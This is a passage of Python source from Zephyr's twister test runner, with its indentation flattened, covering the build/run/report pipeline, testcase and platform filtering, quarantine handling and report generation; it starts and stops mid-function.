instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
results.skipped_runtime += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
inst = res.get("instance", None)
if inst and inst.status == "skipped":
results.skipped_runtime += 1
if res.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.suite = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total - results.skipped_configs
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.status == "error":
results.error += 1
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done, total_tests_width, total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done) / total_to_do) * 100)
skipped = results.skipped_configs + results.skipped_runtime
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if skipped > 0 else Fore.RESET,
skipped,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testcase-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "release",
"twister_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.quarantine = {}
self.platforms = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
self.pipeline = None
self.version = "NA"
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None, initial=False):
results.skipped_configs = 0
results.skipped_cases = 0
for instance in self.instances.values():
if initial:
results.cases += len(instance.testcase.cases)
if instance.status == 'skipped':
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
results.passed += 1
for res in instance.results.values():
if res == 'SKIP':
results.skipped_cases += 1
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total - results.skipped_configs,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{results.total - run - results.skipped_configs}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed, platform_reports, json_report):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version)
self.csv_report(filename + ".csv")
if json_report:
self.json_report(filename + ".json", append=only_failed, version=self.version)
if platform_reports:
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError(f"E: {result['returnmsg']}")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
return len(self.testcases)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
Loads quarantine list from the given yaml file. Creates a dictionary
of all tests configurations (platform + scenario: comment) that shall be
skipped due to quarantine
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = [p.name for p in self.platforms]
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
def load_from_file(self, file, filter_status=[], filter_platform=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testcases[test], platform, self.outdir)
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
if tc.build_on_all and not platform_filter:
platform_scope = self.platforms
elif tc.integration_platforms and self.integration:
platform_scope = list(filter(lambda item: item.name in tc.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and tc.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if tc.platform_allow and not platform_filter and not integration:
a = set(platform_scope)
b = set(filter(lambda item: item.name in tc.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in tc.platform_allow, \
self.platforms))
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if tc.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and "host" not in plat.supported_toolchains \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testcase.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
# run only quarantined test to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all and not integration:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in tc.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
remove_from_discards = [] # configurations to be removed from discards.
for instance in self.discards:
instance.reason = self.discards[instance]
# If integration mode is on all skips on integration_platforms are treated as errors.
if self.integration and instance.platform.name in instance.testcase.integration_platforms \
and "Quarantine" not in instance.reason:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
instance.fill_results_by_status()
self.instances[instance.name] = instance
# Such configuration has to be removed from discards to make sure it won't get skipped
remove_from_discards.append(instance)
else:
instance.status = "skipped"
instance.fill_results_by_status()
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
# Remove from discards configururations that must not be discarded (e.g. integration_platforms when --integration was used)
for instance in remove_from_discards:
del self.discards[instance]
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False):
for instance in self.instances.values():
if build_only:
instance.run = False
if instance.status not in ['passed', 'skipped', 'error']:
logger.debug(f"adding {instance.name}")
instance.status = None
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
pipeline.put({"op": "cmake", "test": instance})
# If the instance got 'error' status before, proceed to the report stage
if instance.status == "error":
pipeline.put({"op": "report", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
# FIXME: This needs to move out.
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(self.calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
return results
def discard_report(self, filename):
try:
if not self.discards:
raise TwisterRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA"):
total = 0
fails = passes = errors = skips = 0
if platform:
selected = [platform]
logger.info(f"Writing target report for {platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
